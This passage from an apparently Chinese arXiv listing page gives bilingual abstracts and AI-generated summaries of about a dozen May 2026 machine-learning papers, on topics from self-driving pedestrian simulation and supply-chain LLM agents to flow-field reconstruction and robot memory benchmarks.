自动驾驶汽车(SDC)的仿真测试通常依赖脚本化行人模型,这些模型无法捕捉真实过街行为的异质性和不确定性,限制了安全评估的真实性,尤其是对于由车辆无法观察到的潜在人格特质支配的乱穿马路行为。我们假设,通过多智能体强化学习(MARL)联合训练行人和SDC,相比针对固定行人策略训练,能产生更真实的交互场景,并且可预测与不可预测过街行为之间的差距可以直接从轨迹中测量。我们使用多智能体近端策略优化(MAPPO)联合训练一个SDC和12个行人:行人移动遵循脚本化的Dijkstra路径规划,而RL策略控制高层的前进/等待决策,乱穿马路概率取决于每个行人在回合开始时采样并隐藏于SDC的特质。在500回合评估中,联合训练的SDC达到78%的目标完成率,碰撞率为14%,而最佳基于规则的基线分别为35%和33%。速度差异指标显示,在近距离(0-3米)范围内,SDC在乱穿马路者附近比在人行横道使用者附近快2.65米/秒,表明乱穿马路遭遇未被预期。乱穿马路占过街事件的13%,但占碰撞的62%,并且联合训练相比单智能体RL减少了30%的碰撞,因为行人学会了在SDC高速接近时等待。

英文摘要

Simulation-based testing of self-driving cars (SDCs) typically relies on scripted pedestrian models that do not capture the heterogeneity and uncertainty of real crossing behavior, limiting the realism of safety assessments, especially for jaywalking, which is governed by latent personality traits the vehicle cannot observe. We hypothesize that jointly training pedestrians and the SDC with multi-agent reinforcement learning (MARL) yields more realistic interaction scenarios than training against fixed pedestrian policies, and that the behavior gap between predictable and unpredictable crossings can be measured directly from trajectories. We co-train an SDC and 12 pedestrians using Multi-Agent Proximal Policy Optimization (MAPPO): pedestrian locomotion follows scripted Dijkstra pathfinding while an RL policy controls high-level go/wait decisions, and jaywalking probability depends on a per-pedestrian trait sampled at episode start and hidden from the SDC. In 500-episode evaluations, the co-trained SDC reached 78% of goals with a 14% collision rate, versus 35%/33% for the best rule-based baseline. A speed differential metric shows the SDC traveled 2.65 m/s faster near jaywalkers than near crosswalk users at close range (0-3 m), indicating jaywalking encounters were not anticipated. Jaywalking was 13% of crossing events but 62% of collisions, and co-training reduced collisions by 30% relative to single-agent RL as pedestrians learned to wait when the SDC approached at speed.
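One plausible way to compute a speed differential of the kind reported above is to compare the vehicle's mean speed near jaywalkers with its mean speed near crosswalk users inside a distance band. The sketch below is an assumed operationalization with made-up numbers; the function name, argument layout, and inclusive 0-3 m band are not taken from the paper.

```python
import numpy as np

def speed_differential(speeds, distances, is_jaywalker, d_min=0.0, d_max=3.0):
    """Mean SDC speed near jaywalkers minus mean speed near crosswalk users.

    Each entry is one (time step, pedestrian) encounter: the vehicle speed in
    m/s, the vehicle-pedestrian distance in m, and whether that pedestrian
    was jaywalking. Only encounters inside [d_min, d_max] are counted.
    """
    speeds = np.asarray(speeds, dtype=float)
    distances = np.asarray(distances, dtype=float)
    is_jaywalker = np.asarray(is_jaywalker, dtype=bool)
    in_range = (distances >= d_min) & (distances <= d_max)
    near_jaywalkers = speeds[in_range & is_jaywalker]
    near_crosswalk = speeds[in_range & ~is_jaywalker]
    return near_jaywalkers.mean() - near_crosswalk.mean()

# Toy encounters (illustrative values only).
speeds = [6.0, 5.0, 3.0, 2.0, 9.0]
distances = [1.0, 2.5, 0.5, 2.0, 10.0]
is_jaywalker = [True, True, False, False, True]
diff = speed_differential(speeds, distances, is_jaywalker)
```

A positive value means the vehicle was moving faster when close to jaywalkers, which is how the abstract interprets its 2.65 m/s figure.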

2605.19186 2026-05-27 cs.AI 版本更新

Discoverable Agent Knowledge -- A Formal Framework for Agentic KG Affordances (Extended Version)

可发现的智能体知识——智能体知识图谱能力的形式化框架(扩展版)

Terry R. Payne, Valentina Tamma, Enrico Daga

发表机构 * School of Computer Science and Informatics, University of Liverpool, UK(利物浦大学计算机科学与信息学学院) Open University(开放大学)

AI总结 本文提出一个四维形式化框架(语义表达性、智能体可发现性、任务相对基础性和认知信任范围),并从中推导出智能体能力概况(AAP),作为VoID和DCAT之上的语义层,支持智能体在规划时进行原则性的知识图谱选择、组合和故障诊断。

详情
AI中文摘要

二十年前,语义网服务社区被问及具有不同本体承诺的智能体如何能够连贯地发现、组合和调用网络服务。答案是OWL-S和WSMO:形式化的能力描述,指定服务能做什么、智能体为了认知上合理调用必须已经知道什么,以及如何形式化地桥接本体不匹配。当前的知识图谱元数据标准(如VoID和DCAT)描述了知识图谱包含什么,但没有说明特定智能体能从中证明什么、空结果受什么封闭假设支配,或者智能体的任务词汇是否在模式中有基础。此外,在已部署的知识图谱中,控制模式描述逻辑和操作性的蕴涵机制可能不同:这是一种当前元数据不可见的认知失效模式。我们针对知识图谱环境重新审视并扩展这些见解,提出了一个四维形式化框架:语义表达性、智能体可发现性、任务相对基础性和认知信任范围,从中我们推导出智能体能力概况(AAP):一个位于VoID和DCAT之上的语义层,使智能体在规划时能够进行原则性的知识图谱选择、组合和故障诊断。这四个维度在单个智能体层面操作化了本体连续体的能力结构,特别用于知识图谱选择、组合和故障诊断。一个来自学术搜索任务的实例具体化了该框架,并通过五点研究议程指出了实现基于AAP的能力匹配规模化所需的形式化、计算和工程工作。

英文摘要

Two decades ago, the Semantic Web Services community was asked how agents with different ontological commitments could discover, compose, and invoke web services coherently. The response was OWL-S and WSMO: formally grounded capability descriptions specifying what a service could do, what the agent must already know for invocation to be epistemically sound, and how ontological mismatches could be formally bridged. Current KG metadata standards such as VoID and DCAT describe what a KG contains, yet say nothing about what a specific agent can prove from it, what closure assumptions govern empty results, or whether the agent's task vocabulary is grounded in the schema. Furthermore, in deployed KGs the governing schema DL and the operative entailment regime can diverge: an epistemic failure mode invisible to current metadata. We revisit and extend these insights for the KG setting with a four-dimensional formal framework (Semantic Expressivity, Agentic Discoverability, Task-Relative Grounding, and Epistemic Trust Scope), from which we derive the Agentic Affordance Profile (AAP): a semantic layer above VoID and DCAT enabling principled KG selection, composition, and failure diagnosis at agent planning time. The four dimensions operationalise the affordance structure of the Ontological Continuum at the individual-agent level, specifically for KG selection, composition, and failure diagnosis. A worked example drawn from a scholarly-search task concretely grounds the framework and identifies the formal, computational, and engineering work needed to realise AAP-based affordance matching at scale through a five-point research agenda.

2605.17036 2026-05-27 cs.AI cs.LG cs.MA cs.SY eess.SY 版本更新

Reliability and Effectiveness of Autonomous AI Agents in Supply Chain Management

自主AI代理在供应链管理中的可靠性与有效性

Carol Xuan Long, David Simchi-Levi, Feng Zhu, Huangyuan Su, Andre P. Calmon, Flavio P. Calmon

发表机构 * Harvard University(哈佛大学) MIT/Purdue(麻省理工学院/普渡大学) MIT(麻省理工学院) Harvard University/Kempner Institute(哈佛大学/肯普纳研究所) Georgia Tech(佐治亚理工学院)

AI总结 本文通过MIT啤酒游戏研究多级供应链中的自主生成式AI代理,发现模型能力是性能主导因素,但平均性能掩盖可靠性风险,并引入代理牛鞭效应,提出基于GRPO的后训练框架以提高可靠性。

详情
AI中文摘要

本文使用MIT啤酒游戏研究多级供应链中的自主生成式AI代理。我们确定了影响性能的四个推理时杠杆:模型选择、策略和护栏、集中数据共享以及提示工程。模型能力是主导因素:开箱即用的推理模型超越人类水平性能,优化后的推理模型相对于人类团队将成本降低高达67%。然而,强劲的平均性能掩盖了显著的可靠性风险。我们引入了代理牛鞭效应:自主多级系统中运行间决策不稳定性的放大。其中一个核心组成部分是决策牛鞭效应,即由随机代理决策而非客户需求变化产生的订单变异性部分。我们表明,即使需求路径固定,决策不稳定性也可以在固定时间点跨设施以及同一设施内随时间放大。重复采样(一种自然的测试时补救措施)未能显著减少这种不稳定性,这表明可靠性需要改变底层决策策略,而不仅仅是平均模型输出。为解决这一限制,我们提出了一种基于组相对策略优化(GRPO)的强化学习后训练框架,该框架使用系统级供应链奖励训练共享的基础LLM。后训练显著减少了尾部事件,抑制了代理牛鞭效应,并提高了自主供应链代理的可靠性。

英文摘要

This paper studies autonomous generative AI agents in multi-echelon supply chains using the MIT Beer Game. We identify four inference-time levers that shape performance: model selection, policies and guardrails, centralized data sharing, and prompt engineering. Model capability is the dominant factor: an out-of-the-box reasoning model exceeds human-level performance, and optimized reasoning models reduce costs by up to 67% relative to human teams. However, strong average performance masks substantial reliability risks. We introduce agent bullwhip: the amplification of run-to-run decision instability in autonomous multi-echelon systems. A central component is decision bullwhip, the portion of order variability generated by stochastic agent decisions rather than by changes in customer demand. We show that decision instability can amplify both across facilities at a fixed point in time and within the same facility over time, even when the demand path is held fixed. Repeated sampling, a natural test-time remedy, fails to meaningfully reduce this instability, suggesting that reliability requires changing the underlying decision policy rather than merely averaging over model outputs. To address this limitation, we propose a Group Relative Policy Optimization (GRPO)-based reinforcement-learning post-training framework that trains a shared base LLM using system-level supply-chain rewards. Post-training substantially reduces tail events, curtails agent bullwhip, and improves the reliability of autonomous supply-chain agents.

2605.16457 2026-05-27 cs.LG cs.AI cs.CV 版本更新

Identifiable Token Correspondence for World Models

可辨识的令牌对应关系用于世界模型

Youngin Kim, Ray Sun, Inho Kim, Bumsoo Park, Hyun Oh Song

发表机构 * Interdisciplinary Program in Artificial Intelligence, Seoul National University(人工智能交叉学科项目,首尔国立大学) Department of Computer Science and Engineering, Seoul National University(计算机科学与工程系,首尔国立大学)

AI总结 提出可辨识的令牌对应关系(ITC)方法,通过将下一帧预测建模为结构化分配问题,解决基于令牌的Transformer世界模型在长程推演中的时间不一致性,在四个基准上达到最先进性能。

详情
AI中文摘要

基于令牌的Transformer世界模型在视觉强化学习中表现出色,但常在长程推演中出现时间不一致性,包括对象重复、消失和变形。一个关键原因是大多数现有方法将下一帧预测纯粹视为令牌生成问题,而未考虑令牌在时间上的持续性。我们引入可辨识的令牌对应关系(ITC),这是一种用于基于令牌的Transformer世界模型的解码步骤,将下一帧预测建模为具有潜在令牌对应变量的结构化分配问题:每个下一帧令牌要么通过从上一帧复制令牌来解释,要么通过生成新令牌来解释。ITC保持Transformer架构和训练过程不变,可以添加到现有骨干网络上。我们的实验在4个具有挑战性的基准上展示了最先进的性能。所提出的方法在Craftax-classic基准上实现了72.5%的回报率和35.6%的分数,显著超过了之前的最佳结果67.4%和27.9%。我们在https://github.com/snu-mllab/Identifiable-Token-Correspondence上发布了源代码。

英文摘要

Token-based transformer world models have shown strong performance in visual reinforcement learning, but often suffer from temporal inconsistency in long-horizon rollouts, including object duplication, disappearance, and transmutation. A key reason is that most existing approaches treat next-frame prediction purely as a token generation problem, without considering the persistence of tokens across time. We introduce Identifiable Token Correspondence (ITC), a decoding step for token-based transformer world models that formulates next-frame prediction as a structured assignment problem with latent token correspondence variables: each next-frame token is explained either by copying a token from the previous frame or by generating a new one. ITC leaves the transformer architecture and training procedure unchanged and can be added on top of existing backbones. Our experiments show state-of-the-art performance on 4 challenging benchmarks. The proposed method achieves a return of 72.5% and a score of 35.6% on the Craftax-classic benchmark, significantly surpassing the previous best of 67.4% and 27.9%. We release our source code on https://github.com/snu-mllab/Identifiable-Token-Correspondence.

2605.04880 2026-05-27 cs.LG cs.AI 版本更新

A Harmonic Mean Formulation of Average Reward Reinforcement Learning in SMDPs

SMDP中平均奖励强化学习的调和均值公式

Erel Shtossel, Alicia Vidler, Uri Shaham, Gal A. Kaminka

发表机构 * Bar Ilan University(巴伊兰大学)

AI总结 针对无限时域非回合制任务中的平均奖励强化学习,提出一种修正的调和均值算子,解决SMDP中奖励和持续时间非平稳时的奖励率计算问题,并证明其理论性质及有效性。

详情
Journal ref
https://alaworkshop2026.github.io/papers/ALA2026_paper_57.pdf
AI中文摘要

最近的研究重新激发并增强了对无限时域、非回合制(持续)任务中未折扣平均奖励强化学习算法的兴趣。半马尔可夫决策过程(SMDP)尤其引人关注。在SMDP中,离散动作随机产生奖励和持续时间,目标是优化平均奖励率。现有算法通过优化奖励与持续时间的比率来逼近这一目标。然而,当奖励和持续时间(在无限时域中)非平稳时,这种方法可能不正确。本文提出一种新颖的修正调和均值算子,即使在上述条件下也能正确计算奖励率。这产生了可以与SMDP一起工作的无模型学习算法,同时保持对随时间变化的非平稳奖励和持续时间分布的鲁棒性。我们证明了修正调和均值算子的理论性质,并通过实验与现有算法相比展示了其有效性。

英文摘要

Recent research has revived and amplified interest in algorithms for undiscounted average reward reinforcement learning in infinite-horizon, non-episodic (continuing) tasks. Semi-Markov decision processes (SMDPs) are of particular interest. In SMDPs, discrete actions stochastically generate both rewards and durations, and the objective is to optimize the average reward rate. Existing algorithms approach this by optimizing the ratio of rewards to durations. However, when rewards and durations are non-stationary (in the infinite horizon), this can be incorrect. This paper presents a novel modified harmonic mean operator that correctly computes reward rates even under such conditions. This yields model-free learning algorithms that can work with SMDPs, while maintaining robustness to non-stationary reward and duration distributions over time. We prove theoretical properties of the modified harmonic mean operator, and empirically demonstrate its efficacy in comparison to existing algorithms.

2605.02207 2026-05-27 cs.CV cs.AI cs.LG 版本更新

MultiSense-Pneumo: A Multimodal Learning Framework for Pneumonia Screening in Resource-Constrained Settings

MultiSense-Pneumo:面向资源受限环境中肺炎筛查的多模态学习框架

Dineth Jayakody, Pasindu Thenahandi, Chameli Dommanige

发表机构 * Department of Computer Science, Old Dominion University, VA, USA(计算机科学系,欧道明大学,弗吉尼亚州,美国)

AI总结 提出MultiSense-Pneumo多模态原型系统,整合症状、咳嗽音频、语音和胸片,通过可解释的后期融合实现肺炎筛查与分诊支持。

详情
AI中文摘要

肺炎仍然是全球发病率和死亡率的主要原因,尤其是在低资源环境中,那里缺乏影像学、实验室检测和专科护理。临床评估依赖于异质性证据,包括症状、呼吸模式、口头描述和胸部影像,使得一线筛查本质上是多模态的。然而,许多现有的计算方法仍然是单模态的,并且主要关注放射影像。在这项工作中,我们提出了MultiSense-Pneumo,一个面向肺炎筛查和分诊支持的多模态研究原型,它整合了结构化症状描述符、咳嗽音频、口语和胸部X光片。该系统结合了确定性症状分诊、基于LightGBM的声学分类、使用ResNet-18的域对抗放射影像分析、基于Transformer的语音识别以及可解释的后期融合算子。每个模态被转换为归一化的关注信号,并聚合为统一的筛查估计。融合权重是手动指定的,被视为启发式、可解释的参数,而不是学习或临床优化的值。MultiSense-Pneumo的设计考虑了在标准笔记本电脑级硬件上的离线执行,但并未作为经过部署验证或临床验证的诊断系统呈现。实验结果表明,在合成域偏移下,放射影像路径具有强大的组件级性能,同时也突出了重要的局限性,特别是咳嗽声学的异常类别召回率降低以及缺乏配对的端到端多模态患者评估。因此,MultiSense-Pneumo旨在作为筛查和分诊研究的框架和组件级原型。

英文摘要

Pneumonia remains a leading global cause of morbidity and mortality, particularly in low-resource settings where access to imaging, laboratory testing, and specialist care is limited. Clinical assessment relies on heterogeneous evidence, including symptoms, respiratory patterns, spoken descriptions, and chest imaging, making frontline screening inherently multimodal. However, many existing computational approaches remain unimodal and focus primarily on radiographs. In this work, we present MultiSense-Pneumo, a multimodal research prototype for pneumonia-oriented screening and triage support that integrates structured symptom descriptors, cough audio, spoken language, and chest radiographs. The system combines deterministic symptom triage, LightGBM-based acoustic classification, domain-adversarial radiograph analysis using ResNet-18, transformer-based speech recognition, and an interpretable late-fusion operator. Each modality is transformed into a normalized concern signal and aggregated into a unified screening estimate. The fusion weights are hand-specified and are treated as heuristic, interpretable parameters rather than learned or clinically optimized values. MultiSense-Pneumo is implemented with offline execution in mind on standard laptop-class hardware, but it is not presented as a deployment-validated or clinically validated diagnostic system. Experimental results demonstrate strong component-level performance of the radiograph pathway under synthetic domain shifts, while also highlighting important limitations, especially reduced abnormal-class recall for cough acoustics and the absence of paired end-to-end multimodal patient evaluation. MultiSense-Pneumo is therefore intended as a framework and component-level prototype for screening and triage research.
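The late-fusion step can be illustrated with a small sketch. The abstract only states that each modality yields a normalized concern signal and that the fusion weights are hand-specified; the weighted average below, the renormalization over whichever modalities are present, the modality names, and the weight values are all assumptions made for illustration.

```python
def late_fusion(signals, weights):
    """Weighted average of per-modality concern signals in [0, 1].

    Modalities whose signal is None are skipped and the remaining weights
    are renormalized, so the result stays in [0, 1].
    """
    present = {name: s for name, s in signals.items() if s is not None}
    if not present:
        raise ValueError("at least one modality signal is required")
    total_weight = sum(weights[name] for name in present)
    weighted_sum = sum(weights[name] * s for name, s in present.items())
    return weighted_sum / total_weight

# Hypothetical hand-specified weights and example signals.
weights = {"symptoms": 0.3, "cough": 0.2, "speech": 0.1, "radiograph": 0.4}
signals = {"symptoms": 0.8, "cough": 0.4, "speech": None, "radiograph": 0.9}
score = late_fusion(signals, weights)
```

Because the weights are explicit, the contribution of each modality to the final estimate can be read off directly, which matches the interpretability goal stated in the abstract; the numbers here carry no clinical meaning.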

2605.08146 2026-05-27 cs.CV cs.AI 版本更新

VT-Bench: A Unified Benchmark for Visual-Tabular Multi-Modal Learning

VT-Bench:视觉-表格多模态学习的统一基准

Zi-Yi Jia, Zi-Jian Cheng, Xin-Yue Zhang, Kun-Yang Yu, Zhi Zhou, Yu-Feng Li, Lan-Zhe Guo

发表机构 * National Key Laboratory for Novel Software Technology, Nanjing University, China(新型软件技术国家重点实验室,南京大学,中国) School of Intelligence Science and Technology, Nanjing University, China(智能科学与技术学院,南京大学,中国) School of Artificial Intelligence, Nanjing University, China(人工智能学院,南京大学,中国)

AI总结 提出首个视觉-表格多模态基准VT-Bench,涵盖9个领域14个数据集,评估23个模型,揭示视觉-表格学习的挑战。

详情
AI中文摘要

多模态学习在视觉-文本任务中引起了广泛关注。然而,在医疗和工业等高危领域起关键作用的视觉-表格数据仍未得到充分探索。本文介绍了VT-Bench,这是第一个用于标准化视觉-表格判别预测和生成推理任务的统一基准。VT-Bench汇集了9个领域(以医疗为中心,同时涵盖宠物、媒体和交通)的14个数据集,超过756K个样本。我们评估了23个代表性模型,包括单模态专家、专门的视觉-表格模型、通用视觉-语言模型(VLM)和工具增强方法,突出了视觉-表格学习的重大挑战。我们相信VT-Bench将激励社区构建更强大的多模态视觉-表格基础模型。 基准:https://github.com/Ziyi-Jia990/VT-Bench

英文摘要

Multi-modal learning has attracted great attention in visual-text tasks. However, visual-tabular data, which plays a pivotal role in high-stakes domains like healthcare and industry, remains underexplored. In this paper, we introduce VT-Bench, the first unified benchmark for standardizing vision-tabular discriminative prediction and generative reasoning tasks. VT-Bench aggregates 14 datasets across 9 domains (medical-centric, while covering pets, media, and transportation) with over 756K samples. We evaluate 23 representative models, including unimodal experts, specialized visual-tabular models, general-purpose vision-language models (VLMs), and tool-augmented methods, highlighting substantial challenges of visual-tabular learning. We believe VT-Bench will stimulate the community to build more powerful multi-modal vision-tabular foundation models. Benchmark: https://github.com/Ziyi-Jia990/VT-Bench

2605.18866 2026-05-27 cs.LG cs.AI 版本更新

FLUIDSPLAT: Reconstructing Physical Fields from Sparse Sensors via Gaussian Primitives

FLUIDSPLAT: 通过高斯原语从稀疏传感器重建物理场

Huaxi Huang, Meng Li, Zhengqing Gao, Xi Zhou, Xiaoshui Huang, Xiao Sun

发表机构 * Shanghai Artificial Intelligence Laboratory(上海人工智能实验室) The Hong Kong University of Science and Technology(香港科技大学) Mohamed bin Zayed University of Artificial Intelligence(穆罕默德·本·扎耶德人工智能大学) Shanghai Jiaotong University(上海交通大学)

AI总结 提出FLUIDSPLAT模型,利用高斯原语作为空间显式中间表示,从稀疏传感器数据重建流场,理论分析了表示能力与观测数的关系,并在多个基准上实现误差降低11-28%。

Comments 24 pages, 5 figures,preprint

详情
AI中文摘要

从稀疏表面安装的传感器重建连续流场是空气动力学设计、流动控制和数字孪生仪器的核心。现有的神经方法通常将传感器读数编码为隐式潜在代码,空间可解释性差,且关于表示能力应如何随观测数量扩展的正式指导有限。受3D高斯泼溅启发,我们引入FLUIDSPLAT,一种传感器条件模型,预测K个各向异性高斯原语,形成单位划分支架,即流场的空间显式且可解释的中间表示。对于理想化的高斯原语估计器,我们证明了对于具有Sobolev光滑度s的场,逼近率为$O(K^{-s/d})$;结合N个含噪声观测,得到偏差$O(K^{-2s/d})$和方差$O(σ^{2}K/N)$的平方风险分解。平衡两者得到$K^{*}\!\sim\!(N/σ^{2})^{d/(2s+d)}$:在稀疏传感下原语数量不能自由增长,揭示了方差瓶颈,促使用状态条件残差解码器补充支架。在涵盖2D和3D的四个基准(圆柱绕流、AirfRANS、FlowBench LDC-3D和PhySense-Car 3D)上,FLUIDSPLAT相比多个强基线实现了11-28%的误差降低。

英文摘要

Reconstructing continuous flow fields from sparse surface-mounted sensors is central to aerodynamic design, flow control, and digital-twin instrumentation. Existing neural methods for this task typically encode sensor readings into implicit latent codes with little spatial interpretability and limited formal guidance on how representational capacity should scale with observation count. Inspired by 3D Gaussian Splatting, we introduce FLUIDSPLAT, a sensor-conditioned model that predicts $K$ anisotropic Gaussian primitives forming a partition-of-unity scaffold, a spatially explicit and interpretable intermediate representation of the flow. For an idealized Gaussian primitive estimator, we prove an $O(K^{-s/d})$ approximation rate for fields with Sobolev smoothness $s$; incorporating $N$ noisy observations yields a squared-risk decomposition with bias $O(K^{-2s/d})$ and variance $O(\sigma^{2}K/N)$. Balancing the two yields $K^{*}\!\sim\!(N/\sigma^{2})^{d/(2s+d)}$: primitive count cannot grow freely under sparse sensing, revealing a variance bottleneck that motivates complementing the scaffold with a state-conditioned residual decoder. Across four benchmarks spanning 2D and 3D (cylinder flow, AirfRANS, FlowBench LDC-3D, and PhySense-Car 3D), FLUIDSPLAT achieves 11-28% error reduction over several strong baselines.
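The balancing step behind the primitive-count rule can be checked numerically. The sketch below sets every hidden constant in the big-O terms to 1, which is an assumption made purely for illustration, and the function names are hypothetical. Setting the squared-bias term K^(-2s/d) equal to the variance term sigma^2 K / N gives K^((2s+d)/d) = N / sigma^2, which is the stated scaling.

```python
import numpy as np

def squared_bias(K, s, d):
    """Squared-bias term K^(-2s/d), with the constant set to 1."""
    return K ** (-2.0 * s / d)

def variance(K, N, sigma):
    """Variance term sigma^2 * K / N, with the constant set to 1."""
    return sigma ** 2 * K / N

def balanced_primitive_count(N, sigma, s, d):
    """K* = (N / sigma^2)^(d / (2s + d)), where the two terms are equal."""
    return (N / sigma ** 2) ** (d / (2.0 * s + d))

# Toy values: 10,000 observations, noise level 0.1, smoothness 2 in 2D.
N, sigma, s, d = 10_000, 0.1, 2.0, 2.0
K_star = balanced_primitive_count(N, sigma, s, d)  # about 100 for these values

# Doubling the observation count grows K* only by a factor 2^(d / (2s + d)).
growth = balanced_primitive_count(2 * N, sigma, s, d) / K_star
```

With these toy values the exponent is 1/3, so doubling the number of observations raises the balanced primitive count by only about 26%, which illustrates why the abstract says the primitive count cannot grow freely under sparse sensing.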

2605.18592 2026-05-27 cs.LG cs.AI cs.CL 版本更新

AMARIS: A Memory-Augmented Rubric Improvement System for Rubric-Based Reinforcement Learning

AMARIS: 一种用于基于评分标准的强化学习的记忆增强评分标准改进系统

Peilin Wu, Xinlu Zhang, Kun Wan, Wentian Zhao, Gang Wu, Xinya Du, Zhiyu Chen

发表机构 * The University of Texas at Dallas(德克萨斯大学达拉斯分校) Adobe Inc.(Adobe公司) Department of Computer Science, University of California, Santa Barbara(加州大学圣芭芭拉分校计算机科学系)

AI总结 提出AMARIS系统,通过持久化评估记忆存储纵向训练证据来改进评分标准,在科学、医学、指令遵循和创意写作任务上优于静态、局部自适应和无记忆基线方法。

Comments Preprint. Under review

详情
AI中文摘要

基于评分标准的奖励塑形为通过强化学习(RL)微调大语言模型(LLMs)提供了可解释且可编辑的奖励信号,但现有的自适应评分标准方法通常从局部证据(如当前批次或实例级比较)更新标准。这种局部视角丢弃了训练过程中产生的诊断信息,使得难以跟踪重复失败、评估之前的评分标准编辑或在早期标准饱和后提高标准。我们引入了AMARIS,一种记忆增强的评分标准改进系统,它将评分标准更新建立在纵向训练证据之上。AMARIS将轨迹分析、步骤级摘要和评分标准更新记录存储在持久化评估记忆中,然后检索最近和语义相关的历史来修订评分标准。我们在全局和实例特定评分标准设置下,在科学、医学、指令遵循和创意写作任务上评估了AMARIS。AMARIS在静态、局部自适应和无记忆基线上有所改进,例如在GPQA-Diamond上比最强基线高出+2.8分,在IFBench上高出+2.2分,同时分析表明记忆减少了振荡性的评分标准编辑,并支持从早期错误纠正到后期课程推进的进展。AMARIS与正常RL循环异步运行,相对于同步评分标准更新减少了阻塞延迟。

英文摘要

Rubric-based reward shaping provides interpretable and editable reward signals for fine-tuning LLMs via reinforcement learning (RL), but existing adaptive rubric methods typically update criteria from local evidence such as the current batch or instance-level comparisons. This local view discards diagnostic information produced during training, making it difficult to track recurring failures, evaluate previous rubric edits, or raise standards once earlier criteria become saturated. We introduce AMARIS, a Memory-Augmented Rubric Improvement System that grounds rubric updates in longitudinal training evidence. AMARIS stores rollout analyses, step-level summaries, and rubric update records in a persistent evaluation memory, then retrieves recent and semantically relevant history to revise rubrics. We evaluate AMARIS across science, medicine, instruction following, and creative writing under both global and instance-specific rubric settings. AMARIS improves over static, local-adaptive, and memory-ablated baselines, for example by +2.8 points on GPQA-Diamond and +2.2 points on IFBench over the strongest baselines, while analysis shows that memory reduces oscillatory rubric edits and supports a progression from early failure correction to later curriculum advancement. AMARIS runs asynchronously alongside the normal RL loop, reducing blocking latency relative to synchronous rubric updates.
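The retrieval step described above ("recent and semantically relevant history") can be illustrated with a small sketch. Everything here is an assumption made for illustration: the record fields (`id`, `step`, `vec`), the use of cosine similarity over precomputed embeddings, and the simple union of the two result sets are not taken from the paper.

```python
import math
from typing import Dict, List, Sequence


def cosine(u: Sequence[float], v: Sequence[float]) -> float:
    """Cosine similarity; returns 0.0 if either vector has zero norm."""
    dot = sum(a * b for a, b in zip(u, v))
    norm = math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v))
    return dot / norm if norm else 0.0


def retrieve(records: List[Dict], query_vec: Sequence[float],
             n_recent: int, n_similar: int) -> List[Dict]:
    """Return the most recent records plus the most similar ones, deduplicated.

    Hypothetical record layout: {"id": str, "step": int, "vec": list of float}.
    """
    recent = sorted(records, key=lambda r: r["step"], reverse=True)[:n_recent]
    similar = sorted(records, key=lambda r: cosine(r["vec"], query_vec),
                     reverse=True)[:n_similar]
    seen, merged = set(), []
    for record in recent + similar:  # recent entries first, then similar ones
        if record["id"] not in seen:
            seen.add(record["id"])
            merged.append(record)
    return merged
```

Combining a recency window with a similarity search is one simple way to surface both the latest rubric edits and older records about the same failure pattern; the actual system may weight or filter them differently.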

2605.17617 2026-05-27 cs.AI 版本更新

GraphMind: From Operational Traces to Self-Evolving Workflow Automation

GraphMind:从操作轨迹到自演化工作流自动化

Yiwen Zhu, Joyce Cahoon, Anna Pavlenko, Qiushi Bai, Nima Shahbazi, Divya Vermareddy, Meina Wang, Mathieu Demarne, Swati Bararia, Wenjing Wang, Hemkesh Vijaya Kumar, Hannah Lerner, Katherine Lin, Steve Toscano, Miso Cilimdzic, Subru Krishnan

发表机构 * Microsoft, USA University of Illinois Chicago, USA Microsoft, Spain

AI总结 提出GraphMind系统,通过离线提取因果工作流图、在线多智能体遍历执行和自适应遍历强化,实现云数据库事故调查中的自动化工作流,相比基线方法减少8倍检索上下文并降低26%幻觉率。

详情
AI中文摘要

协调人员、工具和信息的复杂操作工作流是系统运行的核心,但由于需要大量人工输入且适应能力有限,端到端自动化仍然具有挑战性。我们提出GraphMind,一个以最小人力构建、执行和演化以行动为中心的工作流图的系统。该系统分三个阶段运行。首先,一个可扩展的离线管道从大量人工解决轨迹中提取结构化工作流图,捕捉问题、行动及其因果关系。其次,一个在线多智能体遍历引擎导航该图以动态构建和执行工作流,每一步结合图引导检索与LLM驱动的推理。第三,自适应遍历强化(ATR)强化成功的遍历路径,实现执行信息引导的图适应。GraphMind已部署在四个生产云数据库服务中用于事故调查。在93个保留事故上评估并通过盲审专家验证,该系统在缓解范围、幻觉率和诊断吞吐量方面优于Agentic Summary-RAG基线,同时需要少8倍的检索上下文。ATR层将幻觉率降低26%,证明工作流图可以从执行反馈中学习。一项为期12周的现场研究证实了实用价值:97%的评分对话在交互延迟内产生可操作结果。

英文摘要

Complex operational workflows coordinating personnel, tools, and information are central to system operations, yet end-to-end automation remains challenging due to extensive human input requirements and limited ability to adapt over time. We present GraphMind, a system that constructs, executes, and evolves action-centric workflow graphs with minimal human effort. The system operates in three phases. First, a scalable offline pipeline extracts structured workflow graphs from large volumes of human resolution traces, capturing problems, actions, and their causal relationships. Second, an online multi-agent traversal engine navigates the graph to dynamically construct and execute workflows, combining graph-guided retrieval with LLM-driven reasoning at each step. Third, Adaptive Traversal Reinforcement (ATR) reinforces successful traversal paths, enabling execution-informed graph adaptation. GraphMind has been deployed across four production cloud database services for incident investigation. Evaluated on 93 held-out incidents and validated via blind expert review, the system outperforms an Agentic Summary-RAG baseline in mitigation reach, hallucination rate, and diagnostic throughput while requiring 8x less retrieval context. The ATR layer reduces hallucination rate by 26%, demonstrating that workflow graphs can learn from execution feedback. A 12-week field study confirms practical value: 97% of scored conversations yield actionable results within interactive latency.

2603.04639 2026-05-27 cs.RO cs.AI 版本更新

RoboMME: Benchmarking and Understanding Memory for Robotic Generalist Policies

RoboMME:机器人通用策略的记忆基准与理解

Yinpei Dai, Hongze Fu, Jayjun Lee, Yuejiang Liu, Haoran Zhang, Jianing Yang, Chelsea Finn, Nima Fazeli, Joyce Chai

发表机构 * University of Michigan(密歇根大学) Stanford University(斯坦福大学) Figure AI

AI总结 提出RoboMME基准,通过16个操作任务评估VLA模型在长时程和历史依赖场景中的记忆能力,并基于π0.5骨干网络探索14种记忆增强变体,发现记忆表示的有效性高度依赖于任务。

Comments Accepted to ICML 2026

详情
AI中文摘要

